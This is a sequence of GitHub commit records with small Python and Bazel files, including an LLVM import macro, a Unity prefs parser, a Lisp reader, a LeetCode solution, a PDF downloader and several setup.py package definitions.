sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
urls = [
"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
build_file = "//third_party/llvm:llvm.BUILD",
patch_file = [
"//third_party/llvm:infer_type.patch", # TODO(b/231285230): remove once resolved
"//third_party/llvm:build.patch",
"//third_party/llvm:toolchains.patch",
"//third_party/llvm:temporary.patch", # Cherry-picks and temporary reverts. Do not remove even if temporary.patch is empty.
],
link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
)
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "4004fb6453d9cee1fc0160d6ebac62fa8e898131"
LLVM_SHA256 = "faec068929d9f039b3f65d8f074bfbee4d9bdc0829b50f7848b110f2bf7c3383"
tf_http_archive(
name = name,
sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
urls = [
"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
build_file = "//third_party/llvm:llvm.BUILD",
patch_file = [
"//third_party/llvm:infer_type.patch", # TODO(b/231285230): remove once resolved
"//third_party/llvm:build.patch",
"//third_party/llvm:toolchains.patch",
"//third_party/llvm:temporary.patch", # Cherry-picks and temporary reverts. Do not remove even if temporary.patch is empty.
],
link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
)
|
apache-2.0
|
Python
|
0869a26cc061b86b31e7e5144bf90c276fa8c786
|
Add numpy_checkwiki.py
|
pv/pydocweb,pv/pydocweb
|
numpy_checkwiki.py
|
numpy_checkwiki.py
|
#!/usr/bin/env python
import subprocess
import os, shutil, tempfile
from numpy_towiki import *
PATCH = os.path.join(DIR, 'wiki.patch')
def main():
regenerate_base_xml()
os.chdir(DIR)
new_xml = tempfile.NamedTemporaryFile()
if not os.path.isdir(SITE_PTH):
raise RuntimeError("directory %s not found" % SITE_PTH)
exec_cmd([PYDOCMOIN, 'moin-collect-local', '-o', new_xml.name, WIKI_CONF])
exec_cmd([PYDOCMOIN, 'patch', '-s', SITE_PTH,
BASEXML, new_xml.name, '-o', PATCH], echo=True)
print "Check in %s for what has been changed" % PATCH
if __name__ == "__main__": main()
# vim:sw=4 expandtab smarttab
|
bsd-3-clause
|
Python
|
|
728c4db461bdf22a668436ac25ca1cb9afb80e81
|
add argparse01.py
|
devlights/try-python
|
trypython/stdlib/argparse01.py
|
trypython/stdlib/argparse01.py
|
"""
argparse モジュールのサンプルです。
基本的な使い方について。
参考: http://bit.ly/2UXDCIG
"""
import argparse
import sys
from common.commoncls import SampleBase
from common.commonfunc import pr
class Sample(SampleBase):
def exec(self):
#
# argparse モジュールを使う場合の基本は以下の手順
#
# (1) argparse.ArgumentParser オブジェクト生成
# (2) parser に add_argument メソッドで引数情報を追加
# (3) parser.parse_args メソッド呼び出し
# (4) args から 引数情報 を取得
#
parser = argparse.ArgumentParser(description='argparse sample01')
parser.add_argument('indir', type=str, help='input directory')
parser.add_argument('outdir', type=str, help='output directory')
args = parser.parse_args()
pr('type(parser)', type(parser))
pr('type(args)', type(args))
pr('args.indir', args.indir)
pr('args.outdir', args.outdir)
def go():
sys.argv.append('~/indir')
sys.argv.append('~/outdir')
obj = Sample()
obj.exec()
if __name__ == '__main__':
go()
|
mit
|
Python
|
|
1fd85ad3741f985eb29aa16b4445ed658b3292d0
|
Add existing pyupp.py
|
fmoo/pyupp
|
pyupp.py
|
pyupp.py
|
"""
Read and write unity player preferences data with python
Implementation based on description of .upp files here:
http://answers.unity3d.com/questions/147431/how-can-i-view-a-webplayer-playerprefs-file.html
File structure:
16Byte header
[Saved Prefs]
for each saved pref:
1 byte: length of pref name
pref name
1 byte type identifier
[pref data] (depends on the type)
That are the possible type identifier:
0x00 - 0x7F is a short string that is smaller then 128 characters. The actual number is the length of the saved string.
0x80 is a long string. The type identifier is followed by an additional 32Bit integer (4-byte little endian) length. After the length int you'll find the actual string.
0xFD is an IEEE 32Bit float value(4 bytes).
0xFE is a 32Bit integer (4-byte little endian).
The header consists of the word "UnityPrf" (8 bytes) followed by (i guess) two version integers: 0x10000 and 0x100000
"""
import binascii
import argparse
import six
import struct
import logging
def _debug(msg, dat, is_string = False):
return
if not is_string:
logging.debug("%s (%d bytes) => %s",
msg, len(dat), binascii.hexlify(dat))
else:
logging.debug("%s (%d bytes) => %s", msg,
len(dat), repr(dat))
def _unpack_int(dat):
assert len(dat) == 4
result, = struct.unpack('<i', dat)
return result
def _unpack_float(dat):
assert len(dat) == 4
result, = struct.unpack('<f', dat)
return result
def _pack_int(n):
assert n < 0x7fffffff
assert n >= -0x7fffffff
assert isinstance(n, six.integer_types)
return struct.pack('<i', n)
def _pack_float(f):
assert isinstance(f, float)
return struct.pack('<f', f)
def loads(data):
header = data[:16]
assert header.startswith('UnityPrf')
version = header[8:]
_debug("version", version)
result = {}
body = data[16:]
while len(body):
#_debug("namelen", body[0])
namelen, body = body[0], body[1:]
namelen = ord(namelen)
name, body = body[:namelen], body[namelen:]
#_debug("name", name, True)
assert name not in result
valuetype, body = body[0], body[1:]
#_debug("valuetype", valuetype)
if valuetype == '\xfe':
# 32-bit LE int
packed, body = body[:4], body[4:]
#_debug(name, packed)
result[name] = _unpack_int(packed)
elif valuetype == '\xfd':
# 32-bit LE float
packed, body = body[:4], body[4:]
result[name] = _unpack_float(packed)
elif valuetype == '\x80':
# long string
packedlen, body = body[:4], body[4:]
strlen = _unpack_int(packedlen)
value, body = body[:strlen], body[strlen:]
#_debug(name, value, True)
result[name] = value
else:
# short string?
strlen = ord(valuetype)
assert strlen <= 0x7f
value, body = body[:strlen], body[strlen:]
#_debug(name, value, True)
result[name] = value
return result
def dumps(data):
VERSION = '\x00\x00\x01\x00\x00\x00\x10\x00'
result = 'UnityPrf' + VERSION
for k, v in data.items():
assert len(k) <= 255
result += chr(len(k))
result += k
if isinstance(v, six.string_types):
if len(v) <= 0x7f:
result += chr(len(v))
result += v
else:
result += '\x80'
result += _pack_int(len(v))
result += v
elif isinstance(v, six.integer_types):
result += '\xfe'
result += _pack_int(v)
elif isinstance(v, float):
result += '\xfd'
result += _pack_float(v)
else:
assert False
return result
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument('file')
ns = ap.parse_args()
with open(ns.file, mode='rb') as f:
dat = loads(f.read())
print dat
|
apache-2.0
|
Python
|
|
64921ef6d8aafe505efdc30d070c138c741eb38f
|
Create __init__.py
|
google/BIG-bench,google/BIG-bench
|
bigbench/benchmark_tasks/meta_hello_world/__init__.py
|
bigbench/benchmark_tasks/meta_hello_world/__init__.py
|
apache-2.0
|
Python
|
||
d0ef6fbf836e124693ddafe0aeabf61c6b5ce1ae
|
add reader module
|
ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study
|
compiler/eLisp2/eLisp/reader.py
|
compiler/eLisp2/eLisp/reader.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2015 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import re
import string
from atom import Symbol, String
from number import Number, Integral, LongInt, Float
from lisp import Lisp
from seq import List
DELIM = string.whitespace + Lisp.SPECIAL
class Reader(object):
def __init__(self, source=None):
self.raw_source = source
self.index = 0
self.length = 0
self.sexpr = []
if source:
self.sexpr = self.get_sexpr()
def get_sexpr(self, source=None):
if source:
self.raw_source = source
self.length = len(self.raw_source)
self.index = 0
token = self.get_token()
expr = None
if token == ')':
raise ValueError('Unexpected right paren')
elif token == '(':
expr = []
token = self.get_token()
while token != ')':
if token == '(':
self.prev()
expr.append(self.get_sexpr())
elif token == None:
raise ValueError(
'Invalid end of expression:', self.raw_source)
else:
expr.append(token)
token = self.get_token()
return Lisp(expr)
else:
return token
def get_token(self):
if self.index >= self.length:
return None
# skip whitespace
while self.index < self.length and self.current() in string.whitespace:
self.next()
if self.index == self.length:
return None
if self.current() in Lisp.SPECIAL:
self.next()
return self.previous()
elif self.current() == '"':
# parse a string
s = ''
self.next()
while self.current() != '"' and self.index < self.length:
s = s + self.current()
self.next()
self.next()
return String(s)
else:
token_str = ''
while self.index < self.length - 1:
if self.current() in DELIM:
break
else:
token_str = token_str + self.current()
self.next()
if self.current() not in DELIM:
token_str = token_str + self.current()
self.next()
if Integral.REGEX.match(token_str):
return Integral(int(token_str))
elif Float.REGEX.match(token_str):
return Float(float(token_str))
elif LongInt.REGEX.match(token_str):
return LongInt(int(token_str))
else:
return Symbol(token_str)
return None
def prev(self):
self.index -= 1
def next(self):
self.index += 1
def current(self):
return self.raw_source[self.index]
def previous(self):
return self.raw_source[self.index - 1]
|
bsd-2-clause
|
Python
|
|
ef70a530e9827e96f4984a9c51424cd50b2000cf
|
Create numbersinlists.py
|
wdyer0726/CS101
|
udacity/numbersinlists.py
|
udacity/numbersinlists.py
|
# Numbers in lists by SeanMc from forums
# define a procedure that takes in a string of numbers from 1-9 and
# outputs a list with the following parameters:
# Every number in the string should be inserted into the list.
# If a number x in the string is less than or equal
# to the preceding number y, the number x should be inserted
# into a sublist. Continue adding the following numbers to the
# sublist until reaching a number z that
# is greater than the number y.
# Then add this number z to the normal list and continue.
#Hint - "int()" turns a string's element into a number
def numbers_in_lists(string):
masterlist, sublist = [int(string[0])], []
highestnumber = int(string[0])
for i in string[1:]:
if int(i) <= highestnumber:
sublist.append(int(i))
else:
if sublist:
masterlist.append(sublist)
masterlist.append(int(i))
highestnumber = int(i)
sublist = []
if sublist:
masterlist.append(sublist)
return masterlist
string = '543987'
result = [5,[4,3],9,[8,7]]
print numbers_in_lists(string)
#testcases
string = '543987'
result = [5,[4,3],9,[8,7]]
print repr(string), numbers_in_lists(string) == result
string= '987654321'
result = [9,[8,7,6,5,4,3,2,1]]
print numbers_in_lists(string)
print repr(string), numbers_in_lists(string) == result
string = '455532123266'
result = [4, 5, [5, 5, 3, 2, 1, 2, 3, 2], 6, [6]]
print numbers_in_lists(string)
print repr(string), numbers_in_lists(string) == result
string = '123456789'
result = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print numbers_in_lists(string)
print repr(string), numbers_in_lists(string) == result
|
apache-2.0
|
Python
|
|
ba09b09e7315cafa96e162a8186abe14c51c8128
|
Add a script to download files from url
|
qingkaikong/useful_script,qingkaikong/useful_script,qingkaikong/useful_script,qingkaikong/useful_script,qingkaikong/useful_script
|
python/download_file_from_url.py
|
python/download_file_from_url.py
|
import urllib2
'''
Script to download pdf from a url, you need specify the website URL, and change the
filename in the loop, it mostly useful to download a sequence of files with the
filename only differ by a sequence number, e.g. CH1.PDF, CH2.PDF, CH3.PDF ...
'''
def download_file(download_url, output_name):
'''
Download part,
download_url is the url point to the file
output_name is filename you want to output
'''
response = urllib2.urlopen(download_url)
file = open(output_name, 'w')
file.write(response.read())
file.close()
print(output_name + " Completed")
if __name__ == "__main__":
path = 'http://www.dspguide.com/'
for i in range(35):
#exmaple of the file name is: CH1.PDF
filename = 'CH' + str(i) + '.PDF'
fileloc = path + filename
download_file(fileloc, filename)
|
bsd-3-clause
|
Python
|
|
69c01499e92808f2a513e695d09e58f55dcd569b
|
Update implement-rand10-using-rand7.py
|
kamyu104/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode
|
Python/implement-rand10-using-rand7.py
|
Python/implement-rand10-using-rand7.py
|
# Time: O(1.189), counted by statistics, limit would be O(log10/log7) = O(1.183)
# Space: O(1)
# Given a function rand7 which generates a uniform random integer in the range 1 to 7,
# write a function rand10 which generates a uniform random integer in the range 1 to 10.
#
# Do NOT use system's Math.random().
#
# Example 1:
#
# Input: 1
# Output: [7]
# Example 2:
#
# Input: 2
# Output: [8,4]
# Example 3:
#
# Input: 3
# Output: [8,1,10]
#
# Note:
#
# rand7 is predefined.
# Each testcase has one argument: n, the number of times that rand10 is called.
#
# Follow up:
# - What is the expected value for the number of calls to rand7() function?
# - Could you minimize the number of calls to rand7()?
#
# The rand7() API is already defined for you.
import random
def rand7():
return random.randint(1, 7)
# Reference: https://leetcode.com/problems/implement-rand10-using-rand7/discuss/151567/C++JavaPython-Average-1.199-Call-rand7-Per-rand10
class Solution(object):
def __init__(self):
self.__cache = []
def rand10(self):
"""
:rtype: int
"""
def generate(cache):
n = 32
curr = sum((rand7()-1) * (7**i) for i in xrange(n))
rang = 7**n
while curr < rang//10*10:
cache.append(curr%10+1)
curr /= 10
rang /= 10
while not self.__cache:
generate(self.__cache)
return self.__cache.pop()
# Time: O(2 * (1 + (9/49) + (9/49)^2 + ...)) = O(2/(1-(9/49)) = O(2.45)
# Space: O(1)
class Solution2(object):
def rand10(self):
"""
:rtype: int
"""
while True:
x = (rand7()-1)*7 + (rand7()-1)
if x < 40:
return x%10 + 1
|
# Time: O(1.199), counted by statistics, limit would be O(log10/log7) = O(1.183)
# Space: O(1)
# Given a function rand7 which generates a uniform random integer in the range 1 to 7,
# write a function rand10 which generates a uniform random integer in the range 1 to 10.
#
# Do NOT use system's Math.random().
#
# Example 1:
#
# Input: 1
# Output: [7]
# Example 2:
#
# Input: 2
# Output: [8,4]
# Example 3:
#
# Input: 3
# Output: [8,1,10]
#
# Note:
#
# rand7 is predefined.
# Each testcase has one argument: n, the number of times that rand10 is called.
#
# Follow up:
# - What is the expected value for the number of calls to rand7() function?
# - Could you minimize the number of calls to rand7()?
#
# The rand7() API is already defined for you.
import random
def rand7():
return random.randint(1, 7)
# Reference: https://leetcode.com/problems/implement-rand10-using-rand7/discuss/151567/C++JavaPython-Average-1.199-Call-rand7-Per-rand10
class Solution(object):
def __init__(self):
self.__cache = []
def rand10(self):
"""
:rtype: int
"""
def generate(cache):
n = 19 # if n = 32, it would be O(1.189)
curr = sum((rand7()-1) * (7**i) for i in xrange(n))
rang = 7**n
while curr < rang//10*10:
cache.append(curr%10+1)
curr /= 10
rang /= 10
while not self.__cache:
generate(self.__cache)
return self.__cache.pop()
# Time: O(2 * (1 + (9/49) + (9/49)^2 + ...)) = O(2/(1-(9/49)) = O(2.45)
# Space: O(1)
class Solution2(object):
def rand10(self):
"""
:rtype: int
"""
while True:
x = (rand7()-1)*7 + (rand7()-1)
if x < 40:
return x%10 + 1
|
mit
|
Python
|
a83282f43fdf87bad8abc63c5a0b41f8c9053a5f
|
Add setup script
|
vrtsystems/hszinc,vrtsystems/hszinc
|
setup.py
|
setup.py
|
#!/usr/bin/python
from setuptools import setup
import sys
sys.path.insert(0, 'src')
from hszinc import __version__
setup (name = 'hszinc',
package_dir = {'': 'src'},
version = __version__,
packages = [
'hszinc',
],
)
|
bsd-2-clause
|
Python
|
|
60f6a83964b70700883121afb7aed22a7ffe7acc
|
Add setup.py
|
alanhdu/bfd,AndrewAday/bfd,concord/ml,concord/bfd
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name='bfd',
version='0.1',
description='ML w/ Concord',
url='https://github.com/adi-labs/bfd',
author='Andrew Aday, Alan Du, Carlos Martin, Dennis Wei',
author_email='alanhdu@gmail.com',
license='Apache',
packages=['bcd', 'data'],
install_requires=[
"yahoo-finance",
"concord-py",
"scipy",
"pandas",
"numpy",
],
classifiers=['Development Status :: 3 - Alpha'],
zip_safe=False)
|
apache-2.0
|
Python
|
|
525e0656f57b67744dfa5529687c5d40d3f43327
|
Add address/serializers.py
|
lkmhaqer/gtools-python,lkmhaqer/gtools-python
|
address/serializers.py
|
address/serializers.py
|
# file: address/serializers.py
from rest_framework import serializers
from address.models import ipv6_address, ipv4_address
class Ipv6AddressSerializer(serializers.ModelSerializer):
class Meta:
model = ipv6_address
fields = ('__all__')
class Ipv6AddressSerializer(serializers.ModelSerializer):
class Meta:
model = ipv6_address
fields = ('__all__')
|
mit
|
Python
|
|
66bb6c75017eddd952d43e7dc72004a05c9659b1
|
add test for kvmha_manager
|
leilihh/novaha,leilihh/novaha
|
nova/tests/kvmha/test_kvmha_manager.py
|
nova/tests/kvmha/test_kvmha_manager.py
|
#
# KVM HA in OpenStack (Demo Version)
#
# Copyright HP, Corp. 2014
#
# Authors:
# Lei Li <li.lei2@hp.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.i
#
"""
Unit Tests for nova.kvmha.manager
"""
import mox
import mock
from oslo.config import cfg
import nova
from nova import context
from nova import exception
#from nova.kvmha import manager as kvmha_manager
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova import test
from nova.tests import fake_instance
from nova import utils
CONF = cfg.CONF
CONF.import_opt('kvmha_manager', 'nova.service')
LOG = logging.getLogger(__name__)
class KvmhaTestCase(test.TestCase):
def setUp(self):
super(KvmhaTestCase, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.kvmha = importutils.import_object(CONF.kvmha_manager)
@mock.patch('nova.kvmha.manager.KvmhaManager._get_target_instances')
def test_get_target_instances(self, get_target_instances):
fake_host = 'fake-host'
fake_instances = ['fake1', 'fake2']
get_target_instances.return_value = fake_instances
res = self.kvmha._get_target_instances(fake_host)
self.assertEqual(fake_instances, res)
|
apache-2.0
|
Python
|
|
c05210b4557c56e7b7585ec22b27dd0f34f69f09
|
add a setup.py to make this a nice official package
|
sdgdsffdsfff/google-mysql-tools,dbarobin/google-mysql-tools,sdgdsffdsfff/google-mysql-tools,dbarobin/google-mysql-tools,vincentor/google-mysql-tools,vincentor/google-mysql-tools
|
setup.py
|
setup.py
|
#!/usr/bin/python2.4
#
# Copyright 2006 Google Inc. All Rights Reserved.
from distutils.core import setup
setup(name="google-mysql-tools",
description="Google MySQL Tools",
url="http://code.google.com/p/google-mysql-tools",
version="0.1",
packages=["gmt"],
scripts=["mypgrep.py", "compact_innodb.py"])
|
apache-2.0
|
Python
|
|
4a92b178d6fe2138a70e5f4f9833d7697437561b
|
Add setup.py
|
imom0/django-plim
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup
setup(
name='django_plim',
version='0.0.1',
author='iMom0',
author_email='mobeiheart@gmail.com',
description=('Introduce plim to django'),
license='BSD',
keywords='plim mako django slim',
url='https://github.com/imom0/django-plim',
install_requires=[
'plim>=0.9.1',
],
test_suite='nose.collector',
tests_require='nose==1.3.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Topic :: Utilities',
'License :: OSI Approved :: BSD License',
],
)
|
mit
|
Python
|
|
ba0e4042e25ec007df5766da16902cbeb55388f4
|
add setup.py
|
kontron/python-hpi
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup
def main():
setup(name = 'pyhpi',
version = '1.00',
description = 'Pure python HPI library',
author_email = 'michael.walle@kontron.com',
packages = [ 'pyhpi',
],
)
if __name__ == '__main__':
main()
|
lgpl-2.1
|
Python
|
|
63faa61c35aafd658ced61ee95ed857a33eb398b
|
Add setup.py file
|
playfire/django-bcrypt
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='django-bcrypt',
description="bcrypt password hash support for Django.",
version='0.1',
url='http://code.playfire.com/django-bcrypt',
author='Playfire.com',
author_email='tech@playfire.com',
license='BSD',
packages=find_packages(),
)
|
bsd-3-clause
|
Python
|
|
b97cdbb63923ef3e28bbd329df1afb140f3a349f
|
add setup.py
|
wkcn/mobula
|
setup.py
|
setup.py
|
from setuptools import setup, find_packages
setup(
name = 'mobula',
version = '1.0',
description = 'A Lightweight & Flexible Deep Learning (Neural Network) Framework in Python',
author = 'wkcn',
author_email = 'wkcn@live.cn',
url = 'https://github.com/wkcn/mobula',
packages = find_packages(),
package_data = {
'' : ['*.md'],
'docs' : ['docs/*.md'],
'examples' : ['examples/*.py']
},
keywords = 'Deep Learning Framework in Python',
license = 'MIT',
install_requires = [
'numpy',
'numpy_groupies'
]
)
|
mit
|
Python
|
|
0cd5bba6bddbc7b057ff18268e31d7eac50b2d2c
|
update setup.py
|
ashgan-dev/mailthon,krysros/mailthon,eugene-eeo/mailthon
|
setup.py
|
setup.py
|
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyPackageTest(TestCommand):
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ['tests', '--strict', '-s']
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
setup(
name='mailthon',
version='0.0.0',
description='Elegant email library',
long_description=open('README.rst').read(),
author='Eeo Jun',
author_email='packwolf58@gmail.com',
url='https://github.com/eugene-eeo/mailthon/',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
package_data={'mailthon': ['LICENSE', 'README.rst']},
packages=['mailthon'],
cmdclass={'test': PyPackageTest},
)
|
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyPackageTest(TestCommand):
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ['--strict']
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
setup(
name='mailthon',
version='0.0.0',
description='Elegant email library',
long_description=open('README.rst').read(),
author='Eeo Jun',
author_email='packwolf58@gmail.com',
url='https://github.com/eugene-eeo/mailthon/',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
package_data={'mailthon': ['LICENSE', 'README.rst']},
packages=['mailthon'],
cmdclass={'test': PyPackageTest},
)
|
mit
|
Python
|
29c2f663556d762167499d23921007f025738188
|
update setup.py
|
TetraEtc/limbo,TetraEtc/limbo,llimllib/limbo,llimllib/limbo
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Thanks to Kenneth Reitz, I stole the template for this
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
PYTHON3 = sys.version_info[0] > 2
required = ['requests>=2.12', 'websocket-client==0.40.0',
'beautifulsoup4==4.5.1', 'html5lib==0.999999999', 'pyfiglet==0.7.5',
'certifi==2016.9.26']
if not PYTHON3:
required += ['importlib>=1.0.4']
packages = ['limbo', 'limbo.plugins']
try:
longdesc = open("README.rst").read()
except:
longdesc = ''
setup(
name='limbo',
version='5.0.3',
description='Simple and Clean Slack Chatbot',
long_description=longdesc,
author='Bill Mill',
author_email='bill@billmill.org',
url='https://github.com/llimllib/limbo',
packages=packages,
scripts = ['bin/limbo'],
package_data={'': ['LICENSE',], '': ['limbo/plugins/*.py']},
include_package_data=True,
install_requires=required,
license='MIT',
classifiers=(
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: PyPy',
),
keywords="slack chatbot chat limbo",
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Thanks to Kenneth Reitz, I stole the template for this
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
PYTHON3 = sys.version_info[0] > 2
required = ['requests>=2.9', 'websocket-client==0.35.0',
'beautifulsoup4==4.4.1', 'html5lib==0.9999999', 'pyfiglet==0.7.4',
'certifi==2015.04.28']
if not PYTHON3:
required += ['importlib>=1.0.3']
packages = ['limbo', 'limbo.plugins']
try:
longdesc = open("README.rst").read()
except:
longdesc = ''
setup(
name='limbo',
version='5.0.3',
description='Simple and Clean Slack Chatbot',
long_description=longdesc,
author='Bill Mill',
author_email='bill@billmill.org',
url='https://github.com/llimllib/limbo',
packages=packages,
scripts = ['bin/limbo'],
package_data={'': ['LICENSE',], '': ['limbo/plugins/*.py']},
include_package_data=True,
install_requires=required,
license='MIT',
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
),
)
|
mit
|
Python
|
a6e4f8bf2716eda79a27ec025399b18c76b3356a
|
Fix url
|
seatgeek/graphite-pager,seatgeek/graphite-pager,ProsperWorks/graphite-pager,ProsperWorks/graphite-pager
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from graphitepager import __version__
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def open_file(fname):
return open(os.path.join(os.path.dirname(__file__), fname))
def run_setup():
setup(
name='graphitepager',
version=__version__,
author='Philip Cristiano',
author_email='philipcristiano@gmail.com',
packages=['graphitepager', 'graphitepager.notifiers'],
url='http://github.com/seatgeek/graphite-pager',
license='BSD',
classifiers=[
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 2.6',
'Topic :: System :: Monitoring',
],
description='',
keywords='',
test_suite='tests',
long_description=open_file('README.rst').read(),
install_requires=open_file('requirements.txt').readlines(),
zip_safe=True,
entry_points="""
[console_scripts]
graphite-pager=graphitepager.worker:main
""",
)
if __name__ == '__main__':
run_setup()
|
#!/usr/bin/env python
from graphitepager import __version__
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def open_file(fname):
return open(os.path.join(os.path.dirname(__file__), fname))
def run_setup():
setup(
name='graphitepager',
version=__version__,
author='Philip Cristiano',
author_email='philipcristiano@gmail.com',
packages=['graphitepager', 'graphitepager.notifiers'],
url='http://github.com/philipcristiano/graphite-pager',
license='BSD',
classifiers=[
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 2.6',
'Topic :: System :: Monitoring',
],
description='',
keywords='',
test_suite='tests',
long_description=open_file('README.rst').read(),
install_requires=open_file('requirements.txt').readlines(),
zip_safe=True,
entry_points="""
[console_scripts]
graphite-pager=graphitepager.worker:main
""",
)
if __name__ == '__main__':
run_setup()
|
bsd-2-clause
|
Python
|
b8c739f8befca266544d41d9ace34ae680fe5170
|
add setup.py
|
macrael/webnull
|
setup.py
|
setup.py
|
#!/usr/bin/env python
import os
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
BIN_DIR = os.path.expanduser("~/bin")
def symlink_to_bin():
ln_src = os.path.join(THIS_DIR, "webnull.py")
ln_dest = os.path.join(BIN_DIR, "webnull")
if os.path.isfile(ln_dest):
os.remove(ln_dest)
os.symlink(ln_src, ln_dest)
if __name__ == "__main__":
symlink_to_bin()
|
bsd-3-clause
|
Python
|
|
a03ddd7dc0aa1166e88f71910ece2cd909d7b6c7
|
Add setup.py to executably document package requirements
|
mozilla/remoteobjects,alex/remoteobjects
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup
setup(
name='remoteobjects',
version='1.0',
description='an Object RESTational Model',
packages=['remoteobjects'],
package_dir={'remoteobjects': '.'},
install_requires=['simplejson>=2.0.0', 'httplib2>=0.4.0'],
provides=['remoteobjects'],
author='Six Apart',
author_email='python@sixapart.com',
